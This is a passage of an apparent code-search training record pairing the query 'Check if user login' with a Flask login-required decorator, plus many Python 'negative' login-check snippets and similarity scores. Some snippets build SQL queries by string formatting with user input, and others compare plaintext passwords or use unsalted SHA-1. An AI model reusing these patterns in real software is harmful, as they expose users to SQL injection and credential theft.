_checkUserExists(username,self):\r\n \r\n exists = False\r\n \r\n if _findUser(username) is not None:\r\n exists = True\r\n \r\n return exists", "def check(self):\n\n us = ServiceLocator.resolve(ServiceLocator.USERS)\n\n user_session = self.get()\n user = self.get_user()\n\n return user is not None and us.verify_auth_token(user_session.token, config.SESSION_EXPIRES)", "def testGetUserWithoutData(self):\n self.store.commit()\n with login(u'fluiddb', self.admin.objectID, self.transact) as session:\n deferred = self.facade.getUser(session, u'unknown')\n error = yield self.assertFailure(deferred, TNoSuchUser)\n self.assertEqual(u'unknown', error.name)", "def is_user_present(self, username): # WORKS\n done = self.cur.execute(\"SELECT username FROM users WHERE username = \\\"{}\\\"\".format(username))\n if done == 1:\n return True\n else:\n return False", "def check_auth(username, password):\n return get_ct_object(username, password) is not None", "def testNoPermission(self):\n self.login_user(self.user)\n response = self.client.get(self.url, self.args)\n self.assertEqual(response.status_code, 302)", "def user_logged_in():\n if not session.get('user_id'):\n return \"nope\", 401\n else:\n return \"yep\", 200" ]
[ "0.7631167", "0.7377581", "0.7348826", "0.7320364", "0.72438157", "0.7098895", "0.70730084", "0.70391387", "0.6981259", "0.6977111", "0.6969315", "0.6933913", "0.69154346", "0.6907214", "0.6865833", "0.6815512", "0.6799823", "0.67882526", "0.67734057", "0.67627156", "0.670679", "0.66872627", "0.6678289", "0.6670774", "0.66642874", "0.66642874", "0.66642874", "0.66642874", "0.6658266", "0.6647678", "0.66453034", "0.6643202", "0.6614826", "0.66104454", "0.6610254", "0.6607496", "0.6599286", "0.6599286", "0.6596498", "0.65961397", "0.65958214", "0.6589427", "0.6584934", "0.65828604", "0.65828604", "0.6580714", "0.6571355", "0.6569671", "0.6567775", "0.65668136", "0.6552768", "0.6536445", "0.65211916", "0.6520104", "0.6495194", "0.64897794", "0.6488937", "0.6485867", "0.64820725", "0.6480279", "0.64787126", "0.64693314", "0.64597744", "0.64550805", "0.64550805", "0.64550805", "0.64550805", "0.6442284", "0.64394444", "0.643134", "0.6420422", "0.6419667", "0.63987947", "0.63966054", "0.6391801", "0.6389647", "0.6385969", "0.6379187", "0.6373667", "0.6351344", "0.634396", "0.634396", "0.634396", "0.634396", "0.63412654", "0.63407344", "0.63357306", "0.6333855", "0.6332498", "0.6325428", "0.632134", "0.632134", "0.632134", "0.6314297", "0.6311178", "0.63093805", "0.63085514", "0.63066286", "0.62943804", "0.6292416", "0.6289367" ]
0.0
-1
Check if user login
def require_user(func): @wraps(func) def decorator(*args, **kwargs): if not g.user: # flash('此操作需要登录账户') return render_template('account/error.html', error='抱歉,您无权进行该操作!') # return redirect(url_for('site.login')) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_user_and_login(self) -> Response:\n pass", "def is_correct_user(self, login, password):\n pass", "def check_user_logged():\n global user\n if 'user' not in session:\n return False\n else:\n user = session.get('user')\n return user['username'] != ''", "def logged():\n if session.login==1:\n return True\n else:\n return False", "def check_login(request, username=None):\r\n if request.user is None:\r\n return False\r\n\r\n # if we have a username we're told to check against, make sure the\r\n # username matches\r\n if username is not None and username != request.user.username:\r\n return False\r\n\r\n return True", "def is_logged_in():\n return 'user' in session", "def check_user(self,username, password):\n safe_input = (username, password)\n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=? AND Password=?\",safe_input).fetchone()\n if vals:\n logging.info('%s was authenticated', username)\n return True\n else:\n logging.info('Failed login for %s', username)\n return False", "def login_user():\n pass", "def check_user(self):\n try:\n if (self.get_user()[0][0] == self.username) and (self.check_password(self.password)):\n return True\n else:\n return False\n except:\n return False", "def check_login(self, u, p):\r\n\t\tlogger.debug(\"Entering\")\r\n\t\t\r\n\t\ttry:\r\n\t\t\tval = login.validate_user(u, p)\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, e.message\r\n\t\t\r\n\t\tif val:\r\n\t\t\tlogger.debug(\"Exiting - success\")\r\n\t\t\treturn True, \"Login successful!\"\r\n\t\telse:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, \"Login failed.\"", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def login():", "def login():", "def checkLogin():\n if 'access_token' in login_session:\n return True\n else:\n return False", "def verifyLogin():\n global HUB\n\n loginInfo = FloatingTools.userData()['Login']\n if loginInfo['username'] is None or loginInfo['password'] is None:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False\n try:\n HUB = Github(loginInfo['username'], loginInfo['password'])\n for repo in HUB.get_user().get_repos():\n break\n FloatingTools.Dashboard.setDashboardVariable('logged_in', True)\n return True\n except BadCredentialsException:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def validate_login(self, username, password):\n user = User(self).get(username)\n return user and user['Password'] == password", "def check_auth():", "def check_login(self):\n # read token first\n user_data = self.storage.get_user_data(self.user_id)\n if not \"token\" in user_data:\n sys.exit(\"SEPIA account: No user data found! Please generate a token first (python -m sepia.account --id=[sepia-user-id] --host=[sepia-server-url]).\")\n\n # check token\n token = user_data[\"token\"]\n url = self.host_address + \"/assist/authentication\"\n payload = {\n 'action' : \"check\",\n 'client' : self.client_info,\n 'KEY' : (self.user_id + \";\" + token)\n }\n headers = {\n 'Content-Type': \"application/json\"\n }\n response = requests.request(\"POST\", url, json=payload, headers=headers)\n try:\n res = json.loads(response.text)\n except NameError:\n res = None\n\n if res[\"result\"] and res[\"result\"] == \"success\":\n name = res[\"user_name\"][\"nick\"] or res[\"user_name\"][\"first\"]\n print(\"SEPIA account: Success - Wb \" + name + \", your login token is still valid.\")\n else:\n print(\"SEPIA account: Failed - I think the token is invalid or we got connection problems.\")", "def isLoggedIn(self):\n session = self.getSession()\n if session is not None:\n return True\n return False", "def test_user_login_attempt_when_user_already_logged_in(self):\n\t\tpass", "def logged_in(browser: RoboBrowser):\n login_div = browser.find('div', content=\"Login\")\n return True if not login_div else False", "def user_in_session():\n return 'user_id' in login_session", "def login_check(self, username, password):\n can_login, msg = self.db.check_login(username, password)\n self.send_message(str(can_login) + DOLLAR + msg)", "def check_my_users(user):\n user_data = my_users.get(user['username'])\n if not user_data:\n return False # <--- invalid credentials\n elif user_data.get('password') == user['password']:\n return True # <--- user is logged in!\n\n return False # <--- invalid credentials", "def is_logged_in(session):\n return 'user' in session", "def __check_user_exist(self):\n\n login_form = self.login_form()\n\n user = User.query.filter_by(username=login_form.username.data).first()\n if user is None or not user.get_password(login_form.password.data):\n flash('Invalid username or password') # TODO: flash in Template hinzufuegen\n return redirect(url_for('login'))\n\n login_user(user, remember=login_form.remember_me.data)\n\n next_page = request.args.get('next')\n\n # if 'next' is found and the host is specified\n # it will redirect\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n\n return redirect(next_page)", "def loginState(self, user_data):\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def check_user(used_name, used_password):\n user_exists = UserData.user_login(used_name, used_password)\n\n return user_exists", "def log_in(user_name,password):\n log_in == User.log_in(user_name,password)\n if log_in != False:\n return User.log_in(user_name,password)", "def is_logged_in(self, params):\n email = self.credentials.get('email', '')\n password = self.credentials.get('password', '')\n if email != '' and password != '':\n return False\n return self.netflix_session.is_logged_in(account=self.credentials)", "def logged_in():\n\n if current_user.is_authenticated:\n return True\n\n return False", "def check_user(self, login, password):\n user = self.cursor.execute(\n '''SELECT * FROM users WHERE login = ?''', login).fetchone()\n if user is not None:\n if user[3] == password:\n return Message('response', 'User exists')\n else:\n return Message('response',\n 'Users exists. Check password')\n else:\n return Message('response', 'User does not exists')", "def login(uname, password, db, session):\n\tquery = db((db.User.username == uname) & (db.User.password == password))\n\tif query.count() == 1:\n\t\tsession.auth = query.select().first().id\n\t\treturn True\n\telse:\n\t\treturn False", "def is_logged_in(self, login_url: str) -> bool:\n self.d('Check login - %s', login_url)\n if not login_url:\n return False\n res = self.get(login_url, allow_redirects=False)\n if res.status_code == 302:\n self.i('Is logged in')\n return True\n self.i('Is not logged in')\n return False", "def _login(self):\n if User.login(self.session.teller_id, self.session.teller_pin, 'teller'):\n return True\n else:\n self.session.output({'authentication_failure': 'wrong ID or PIN\\n'}, '[ Login failed ]')\n return False", "def login_user(username,password):\n \n check_user = Records.verify_user(username,password)\n return check_user", "def validUser(self):\n if self.state == SessionStates.LOGGED_OUT:\n return False\n\n # if self.user == None:\n # return False\n return True", "def CheckLogin(self) :\n url = Judge.UrlStatus + 'contestId=1&search=true&firstId=-1&lastId=-1&handle=' + self.username\n logging.info(\"open_url %s\" % url)\n req = urllib2.Request(url, headers=Judge.Headers)\n rsp = self.opener.open(req)\n res = None\n if rsp :\n res = rsp.read()\n #wf(\"CheckLogin_\", res)\n result = self.__parse_result(None, res, need_extra_info=False)\n if result and result.has_key('origin_runid') :\n #print \"CheckLogin last_submit_time{%s}END\" % result['_submit_time']\n self.last_runid = result['origin_runid']\n return res and res.find(r'<a href=\"/onlinejudge/login.do\">Login</a>') == -1", "def is_logged_in():\n _has_cookie = util.web.has_cookie('pass')\n if _has_cookie:\n _is_expired = util.web.is_cookie_expired('pass')\n if _is_expired:\n return False\n return True\n return False", "def valid_login(username: str, password: str):\n\n try:\n LoginHandler.login(username, password)\n global validLogin\n validLogin = True\n except:\n validLogin = False", "def check_if_should_always_be_logged_in(connection,username_log):\r\n with connection:\r\n c = connection.execute(SELECT_USER_BY_LOGIN_PREVILAGES, (username_log,))\r\n return c.fetchone()", "def login():\n pass", "def user_auth(request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n if UserInformation.objects.filter(user=user).exists():\n return True\n return False", "def is_logged_in(self) -> bool:\n return self.id is not None and self.username is not None", "def check_authentication():\r\n\r\n #TODO: Reservation based authentication\r\n try:\r\n authenticated_user()\r\n except Exception as e:\r\n return e\r\n\r\n return True", "def is_logged_in() -> bool:\n is_dev_login_disabled = SETTINGS.DEV_LOGIN_DISABLED and is_localhost()\n return bool(is_dev_login_disabled or is_logged_in_user())", "def check_user(self):\n try:\n if self.get_customer()[0][0] == self.dni:\n return True\n else:\n return False\n except:\n return False", "def check(self):\n\n us = ServiceLocator.resolve(ServiceLocator.USERS)\n\n user_session = self.get()\n user = self.get_user()\n\n return user is not None and us.verify_auth_token(user_session.token, config.SESSION_EXPIRES)", "def check_auth(username, password):\n # return username == app.config['USER'] and password == app.config['PASS']\n\n return username == app.config['USER'] and password == app.config['PASS']", "def is_logged_in(self):\n return self.router.token is not None", "def test_user_can_login(self):\n user = authenticate(username='Marry', password='secret')\n self.assertFalse(user is None)\n self.assertTrue(user.is_authenticated)", "def _check_auth(self):\n if self.authToken:\n return True\n else:\n msg = \"you need to login\"\n self.raise_error(msg)", "def is_logged_in():\n logged_in = \"uid\" in session\n if logged_in:\n user = api.user.get_user(uid=session[\"uid\"])\n if not user or (user.get(\"disabled\", False) is True):\n logout()\n return False\n return logged_in", "def user_exists(self, login):\n\t\tif login in self.users_by_name and isinstance(self.users_by_name[login], VDOM_user):\n\t\t\treturn True\n\t\treturn False", "def check_auth(username, password):\r\n return username == current_app.config['ADMIN_USERNAME'] \\\r\n and password == current_app.config['ADMIN_PASSWORD']", "def CheckLogin(self):\n \n username = self.username.get().lstrip().rstrip()\n if not username:\n messagebox.showerror('Error', 'No username entered.')\n return False, None, None\n \n password = self.password.get().lstrip().rstrip()\n if not password:\n messagebox.showerror('Error', 'No password entered.')\n return False, None, None\n \n for user in self.user_db:\n if user['User'] == username:\n if user['Password'] == password:\n # Retrive the last log-in date, then update value to now\n prev_login = user['LastLogIn']\n user['LastLogIn'] = date.today().strftime('%B %d, %Y')\n return True, username, prev_login\n else:\n messagebox.showerror('Error',\n 'The provided password is incorrect.')\n return False, None, None\n \n messagebox.showerror('Error', f'User {username} does not exist.')\n return False, None, None", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def is_logged_in(self, email):\n wait_for_element(self.browser, self.expand_left_panel)\n expand_panel = self.browser.find_element(*self.expand_left_panel)\n custom_click(self.browser, expand_panel)\n wait_for(lambda: len(self.browser.find_element(*self.logged_user).text) > 0, delay=1, num_sec=5)\n user_logged_in = self.browser.find_element(*self.logged_user).text\n if user_logged_in == email:\n return True\n else:\n raise Exception('Failed to login by user => {}'.format(email))", "def login(self, returnToURL):\r\n\t\tif not self.request().hasValue('userId') or \\\r\n\t\t\tnot self.request().hasValue('password'):\r\n\t\t\tself.response().sendRedirect('/nova/login.psp?returnToURL=%s' % returnToURL)\r\n\t\t\treturn 0\r\n\t\treturn 1", "def logged_in(request):\n return request.current_user is not None", "def check_login_response(self, response):\n\t\tprint(response.body)\n\t\tif login_error[0] not in response.body.decode('utf-8'):\n\t\t self.log(\"Successfully logged in. Let's start crawling!\")\n\t\t # Now the crawling can begin..\n\t\t return self.initialized()\n\t\t print(\"logged in\")\n\t\telse:\n\t\t self.log(\"Bad times :(\")\n\t\t # Something went wrong, we couldn't log in, so nothing happens.", "def login_check():\n\n user_email = request.form['email']\n user_password = request.form['password']\n\n # Check user info against database\n email_query = User.query.filter_by(email=user_email).first()\n if email_query == None:\n flash('Invalid email or password')\n return redirect('/')\n\n # Get user's id using email\n user_id = email_query.user_id\n\n # Valid user password\n if user_password == email_query.password:\n #create user session\n session['user'] = email_query.user_id\n return redirect('/user-%s' % user_id)\n else:\n flash('Invalid email or password')\n return redirect('/')", "def login_to_system(credentials):\n return True if credentials else False", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def validarLogin(self, usuario, senha):\r\n try:\r\n if usuario is not None and senha is not None:\r\n self.cursor.execute(\"SELECT SENHA FROM LOGIN WHERE USUARIO = '%s';\" %(usuario))\r\n self.__temp = self.cursor.fetchone()\r\n if self.__temp[0] == senha:\r\n return True\r\n return False\r\n except:\r\n return False", "def login_form_valid(self, form):\n self.request.session.update({\n 'user_is_none': None,\n 'user_is_active': None\n })\n\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n user = authenticate(email=email, password=password)\n\n if user is None:\n self.request.session['user_is_none'] = True\n return HttpResponseRedirect('/user_account/')\n elif user.active is False:\n self.request.session['user_is_active'] = False\n return HttpResponseRedirect('/user_account/')\n else:\n self.request.session.update({\n 'user_is_none': False,\n 'user_is_active': True\n })\n login(self.request, user)\n return HttpResponseRedirect('/schedule/')", "def default_login_works(self):\n return True if self.default_login_auth_header else False", "def check_auth(username, password):\n return get_ct_object(username, password) is not None", "def test_can_login(self):\n user = authenticate(username='jack', password='secret')\n self.assertTrue(user is not None)\n self.assertTrue(user.is_authenticated)", "def is_valid_login(self, username, password):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_IS_LOGIN_INFORMATION_VALID, username + '|' + password)", "def check_auth(username, password):\n return username == 'asimov' and password == 'tagada72'", "def login(self):\n\t\treturn", "def is_registered(self):\n if self.user == getpass.getuser():\n return True\n else:\n return False", "def is_logged_in_user_valid(user_name, password):\n if user_name.upper() == \"HELLO\" and password == \"World\":\n return True # User input matches user name and password.\n else:\n return False # User input does not match user name and password.s", "def check_login_status(self):\n\n if (hasattr(self, 'username') and hasattr(self, 'password')\n and hasattr(self, 'session')):\n authenticated = self._request('POST', CosmoSim.QUERY_URL,\n auth=(self.username, self.password),\n cache=False)\n if authenticated.status_code == 200:\n warnings.warn(\"Status: You are logged in as {0}.\"\n .format(self.username))\n soup = BeautifulSoup(authenticated.content, \"lxml\")\n self.delete_job(jobid=str(soup.find(\"uws:jobref\")[\"id\"]),\n squash=True)\n else:\n warnings.warn(\"Status: The username/password combination \"\n \"for {0} appears to be incorrect.\"\n .format(self.username))\n warnings.warn(\"Please re-attempt to login with your cosmosim \"\n \"credentials.\")\n else:\n warnings.warn(\"Status: You are not logged in.\")", "def is_logged_in(self, username):\n if username in self.users:\n return self.users[username].is_logged\n return False", "def logged_in(self):\n return self.user is not None", "def is_authenticated(self):\n result = self.lpass(\"lpass status\")\n\n if \"Logged in as\" in result.output:\n return True\n\n return False", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def _logged_in_successful(data):\r\n if re.match(r'^:(testserver\\.local|tmi\\.twitch\\.tv)'\r\n r' NOTICE \\* :'\r\n r'(Login unsuccessful|Error logging in)*$',\r\n data.strip()):\r\n return False\r\n else:\r\n return True", "def is_logged_in(session):\n if 'tid' in session:\n return {'success': 1, 'message': '你处于登录状态.', \n 'teamname': session['teamname'], 'is_zju_user': session['is_zju_user']}\n else:\n return {\"success\": 0, \"message\": \"你并未处于登录状态.\"}", "def is_regular_user(user):\n return user.is_authenticated()", "def login(self):", "def check_auth(username, password):\n return username == 'admin' and password == 'worcester'", "def check_auth(username, password):\n return username == app.config['USERNAME'] and (\n password == app.config['PASSWORD'])", "def login(UserID, Password):\n\tif UserID in USERS and USERS[UserID] == Password:\n\t\treturn True\n\telse:\n\t\treturn False", "def is_logged_in(self):\n return self.cookie is not None", "def check_auth(username, password):\n return username == 'admin' and password == 'admin'", "def check_auth(username, password):\n return (username == app.config['USERNAME'] and\n password == app.config['PASSWORD'])", "def check_auth(username, password):\n return username == USERNAME and password == PASSWORD", "def check_auth(username, password):\n return username == 'jeffkoons' and password == 'likesweirdbaloons'", "def checkLogin(self):\n if self._thread:\n return False\n\n try:\n return self._checkLogin()\n except Exception:\n self.expired = True\n self.finished = True\n\n return False", "def check_login(db, useremail, password):\n import hashlib\n\n cursor = db.cursor().execute('SELECT password FROM users WHERE email IS ?', [useremail])\n result = cursor.fetchone()\n if result:\n return result[0] == hashlib.sha1(password.encode()).hexdigest()\n return False", "def check_auth(username, password):\n return username == 'admin' and password == 'password'", "def _can_login(self):\n return all([self.user.is_active, self.status, self.status_detail == \"active\"])", "def do_login():\n\n isTeacher = False\n\n # check if this_user is admin or normal user\n this_user = User.query.filter_by(username=request.form['username']).first()\n \n # is this_user is not student or admin then check teacher table\n if this_user is None:\n this_user = Teacher.query.filter_by(username=request.form['username']).first()\n isTeacher = True\n\n # if this_user is still none -> invalid user\n if this_user is not None:\n if this_user.password == request.form[\"password\"]:\n session['authenticated'] = True\n session['username'] = this_user.username\n session['name'] = this_user.name\n session['isTeacher'] = isTeacher\n if session['username'] == \"admin\":\n session['wasAt'] = \"manageusers\"\n try:\n session['cpi'] = this_user.cpi\n session['grp_size'] = this_user.group_size\n except:\n pass\n else:\n flash(\"Incorrect Password, Please Try Again\") \n else:\n flash(\"Invalid Username, Please Try Again\")\n return home()", "def check_auth(username, password):\n return username == 'admin' and password == 'Passw0rd'", "def check_auth(username, password):\n return username == 'admin' and password == 'root'", "def acctLogin(self):\n loggedIn = False\n if self.acctObj.login():\n loggedIn = True\n else:\n logger.warning(\"{} Authentication failed\".format(self))\n self.acctObj = None\n\n if loggedIn:\n return True\n return False" ]
[ "0.8381395", "0.8055585", "0.7813263", "0.7678583", "0.7649151", "0.7576734", "0.7567418", "0.7521423", "0.75094885", "0.7488563", "0.74643886", "0.7460811", "0.7460811", "0.7443086", "0.7417814", "0.74102914", "0.7391327", "0.73445153", "0.73423046", "0.72956836", "0.7277331", "0.72458184", "0.7244352", "0.724247", "0.723785", "0.7231149", "0.72120786", "0.7196707", "0.71806514", "0.71768206", "0.7166374", "0.7160414", "0.7157582", "0.71544594", "0.7114222", "0.7111135", "0.71090746", "0.70937395", "0.70930314", "0.7076667", "0.7073319", "0.7061583", "0.70432377", "0.7025321", "0.70132774", "0.7009884", "0.6997237", "0.6990148", "0.69825286", "0.6976101", "0.69747275", "0.695906", "0.6944757", "0.69443876", "0.6941434", "0.69339997", "0.69278216", "0.6924908", "0.6917136", "0.691316", "0.6908974", "0.6903402", "0.6894987", "0.68923765", "0.6886722", "0.6878631", "0.6870336", "0.68470937", "0.68447274", "0.6842939", "0.68408334", "0.6840231", "0.68296224", "0.68287593", "0.68269473", "0.6823845", "0.68073136", "0.6806805", "0.68049407", "0.6797839", "0.6797839", "0.6796853", "0.67956036", "0.67931885", "0.679113", "0.6784908", "0.6784704", "0.67844296", "0.6783589", "0.67728573", "0.6772496", "0.67714155", "0.6767632", "0.675321", "0.675311", "0.6749905", "0.67493784", "0.6744074", "0.6741154", "0.6737048", "0.6733501" ]
0.0
-1
Check if mobile user login
def require_mobile_user(func): @wraps(func) def decorator(*args, **kwargs): if not g.user: return redirect(url_for('wechat.signin')) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_mobile(request):\n MOBILE_AGENT_RE=re.compile(r\".*(iphone|mobile|androidtouch)\",re.IGNORECASE)\n\n if MOBILE_AGENT_RE.match(request.META['HTTP_USER_AGENT']):\n return True\n else:\n return False", "def mobile(request):\n MOBILE_AGENT_RE = re.compile(\n r\".*(iphone|mobile|androidtouch)\", re.IGNORECASE)\n if MOBILE_AGENT_RE.match(request.META['HTTP_USER_AGENT']):\n return True\n else:\n return False", "def _login(self):\n if User.login(self.session.teller_id, self.session.teller_pin, 'teller'):\n return True\n else:\n self.session.output({'authentication_failure': 'wrong ID or PIN\\n'}, '[ Login failed ]')\n return False", "def is_mobile(request_object):\n \n return utilities.is_mobile(request_object)", "def checkLogin():\n if 'access_token' in login_session:\n return True\n else:\n return False", "def omm_login():\r\n msg, status = \"\", True\r\n try:\r\n if g.platform == 'android':\r\n sleep(5)\r\n 'Enters value in password text box based on the user inputs'\r\n flag1 = ui_controls.text_box(get_obj_identifier('login_enterPassword_txt'), value=g.password)\r\n sleep(3)\r\n 'Clicks on the login button'\r\n flag2 = ui_controls.button(get_obj_identifier('login_createPasswordLogin_btn'))\r\n \r\n status = False if not (flag1 and flag2) else True\r\n else: \r\n 'Enters value in password text box based on the user inputs'\r\n flag1 = ui_controls.setValue(get_obj_identifier('login_enterPassword_txt'), value=g.password)\r\n\r\n 'Clicks on the login button'\r\n flag2 = ui_controls.button(get_obj_identifier('login_btn'))\r\n \r\n status = False if not (flag1 and flag2) else True\r\n \r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n status = False\r\n return status, msg", "def check_user_and_login(self) -> Response:\n pass", "def set_mobile_session(id_token):\n try:\n user = google.oauth2.id_token.verify_oauth2_token(id_token, requests.Request())\n return True, user['name'].replace(' ', '_')\n except ValueError:\n raise exceptions.TokenExpired()", "def logged_in(browser: RoboBrowser):\n login_div = browser.find('div', content=\"Login\")\n return True if not login_div else False", "def is_correct_user(self, login, password):\n pass", "def login():\r\n if not request.is_json or 'phone_number' not in request.get_json() or 'password' not in request.get_json():\r\n return bad_request('Missing required data.')\r\n return login_user(request)", "def phone_mobile(self, instance):\r\n return instance.user.profile.phone_mobile", "def is_integrated(user):\n if user.is_authenticated() and user.is_active:\n return NokiaUser.objects.filter(user=user).exists()\n return False", "def login_mobile(request):\n\n email = request.POST['email'].lower()\n pin = hashlib.sha224(request.POST['pin']).hexdigest()\n user = authenticate(username=email, pin=pin)\n if user is not None:\n login(request, user)\n logger.debug( \"User %s authenticated and logged in\"%email )\n exp_group = user.experiment.id\n # log latitude and longitude\n if 'lat' in request.POST:\n event = Event(user=user, action=Event.LOGIN, latitude=float(request.POST['lat']), longitude=float(request.POST['lon']))\n event.save()\n return JSONHttpResponse({'result': '1', 'experiment': str(exp_group), 'first_name': str(user.first_name)}) \n else:\n return JSONHttpResponse({'result': '-1'})\n\n\n # TODO: if basic login, send to Home\n # if group purchase alert, send to that specific group purchase info\n # if price down alert, send to the item \n return JSONHttpResponse()", "def check_auth():", "def otp_is_verified(request):\n auth = JSONWebTokenAuthentication()\n jwt_value = auth.get_jwt_value(request)\n if jwt_value is None:\n return False\n\n payload = jwt_decode_handler(jwt_value)\n persistent_id = payload.get('otp_device_id')\n\n if persistent_id:\n device = Device.from_persistent_id(persistent_id)\n if device is not None and device.user_id != request.user.id:\n return False\n # Valid device in JWT\n return True\n return False", "def detect_login(soup):\n \n main = soup.find(id='main')\n notice = main.find(class_='notice')\n for c in notice.children:\n if c.name == 'div':\n if c.has_attr('class') and 'formulaire_login' in c['class']:\n return True\n \n return False", "def log_in(self):\n print('-=' * 12 + \" Log in \" + '-=' * 12)\n mob_num, password = self._input_mob_num('Mobile Number :'), input(\"Password: \")\n self._user = self.auth.log_in(mob_num, password)\n if self._user:\n print(\"you are logged in, Welcome '{}'\".format(self._user.username))\n self.homepage()\n else:\n print(\"Mobile number or/and password is/are Invaild \\n\" + '-=' * 30)\n options = {1: self.log_in, 2: self.logging_page, 3: self.exit}\n print_out = \"(1) Try Again \\n (2) Back to Logging Page \\n (3) Exit\"\n self._take_option(options, print_out)", "def login(request):\n data = {}\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n mob_no = form.cleaned_data.get('mob_no')\n password = form.cleaned_data.get('password')\n u_obj = Login.objects.filter(mobile_number=mob_no,\n password=password)\n if u_obj:\n data['success']=1\n data['message']='login successful'\n return JsonResponse(data)\n else:\n data['success']=0\n data['message']='login error'\n return JsonResponse(data)\n else:\n form = LoginForm()\n return render(request, 'login/login.html',\n {'form':form,})", "def check_mobile(data):\n\n firebase_uid = data['session'].split('/')[-1]\n db = firebase.database()\n follow_up_event = \"continue_house\"\n mobile = db.child(\"user_data\").child(firebase_uid).child(\"Mobile Number\").get().val()\n try:\n origin = data[\"queryResult\"][\"fulfillmentMessages\"][1][\"payload\"][\"origin\"]\n if origin == \"confirmedCall\":\n follow_up_event = \"continue_call\"\n except:\n pass\n if mobile == \"0\" or mobile is None:\n print(\"Mobile number not found.\")\n response = {\n \"followupEventInput\": {\n \"name\": \"request_mobile\",\n \"languageCode\": \"en-US\"\n }}\n else:\n print(\"Mobile number found: \" + mobile)\n response = {\n \"followupEventInput\": {\n \"name\": follow_up_event,\n \"languageCode\": \"en-US\"\n }\n }\n return response", "def login_to_system(credentials):\n return True if credentials else False", "def loginState(self, user_data):\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def user_in_session():\n return 'user_id' in login_session", "def verifyLogin():\n global HUB\n\n loginInfo = FloatingTools.userData()['Login']\n if loginInfo['username'] is None or loginInfo['password'] is None:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False\n try:\n HUB = Github(loginInfo['username'], loginInfo['password'])\n for repo in HUB.get_user().get_repos():\n break\n FloatingTools.Dashboard.setDashboardVariable('logged_in', True)\n return True\n except BadCredentialsException:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False", "def _logged_in_successful(data):\r\n if re.match(r'^:(testserver\\.local|tmi\\.twitch\\.tv)'\r\n r' NOTICE \\* :'\r\n r'(Login unsuccessful|Error logging in)*$',\r\n data.strip()):\r\n return False\r\n else:\r\n return True", "def login_user():\n pass", "def check_user(self):\n try:\n if self.get_customer()[0][0] == self.dni:\n return True\n else:\n return False\n except:\n return False", "def check_login(self):\n # read token first\n user_data = self.storage.get_user_data(self.user_id)\n if not \"token\" in user_data:\n sys.exit(\"SEPIA account: No user data found! Please generate a token first (python -m sepia.account --id=[sepia-user-id] --host=[sepia-server-url]).\")\n\n # check token\n token = user_data[\"token\"]\n url = self.host_address + \"/assist/authentication\"\n payload = {\n 'action' : \"check\",\n 'client' : self.client_info,\n 'KEY' : (self.user_id + \";\" + token)\n }\n headers = {\n 'Content-Type': \"application/json\"\n }\n response = requests.request(\"POST\", url, json=payload, headers=headers)\n try:\n res = json.loads(response.text)\n except NameError:\n res = None\n\n if res[\"result\"] and res[\"result\"] == \"success\":\n name = res[\"user_name\"][\"nick\"] or res[\"user_name\"][\"first\"]\n print(\"SEPIA account: Success - Wb \" + name + \", your login token is still valid.\")\n else:\n print(\"SEPIA account: Failed - I think the token is invalid or we got connection problems.\")", "def _check_user_pass(self):\n if not self.username:\n self.username = input(' 请输入手机号:')\n if self.username.isdigit() and '+86' not in self.username:\n self.username = '+86' + self.username\n\n if not self.password:\n self.password = input(' 请输入密码:')", "def user_login():\n \n data = user_obj.user_login()\n return data", "async def check_authenticated(self):\n\n def function():\n return self._api.request(\"user\", \"getdevice\", version=\"v2\")\n\n return await self.call(function)", "def is_logged_in(self, email):\n wait_for_element(self.browser, self.expand_left_panel)\n expand_panel = self.browser.find_element(*self.expand_left_panel)\n custom_click(self.browser, expand_panel)\n wait_for(lambda: len(self.browser.find_element(*self.logged_user).text) > 0, delay=1, num_sec=5)\n user_logged_in = self.browser.find_element(*self.logged_user).text\n if user_logged_in == email:\n return True\n else:\n raise Exception('Failed to login by user => {}'.format(email))", "def user_auth(request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n if UserInformation.objects.filter(user=user).exists():\n return True\n return False", "def i_am_in_the_login_page(browser):", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def logged():\n if session.login==1:\n return True\n else:\n return False", "def is_logged_in(self, params):\n email = self.credentials.get('email', '')\n password = self.credentials.get('password', '')\n if email != '' and password != '':\n return False\n return self.netflix_session.is_logged_in(account=self.credentials)", "def username(provider, username):\n\n if provider == 'alditalk':\n if username.isdigit(): # only mobile number\n return True\n else:\n return False\n elif provider == 'netzclub': # mobile number and email\n if ((username.isdigit()) or (\"@\" in 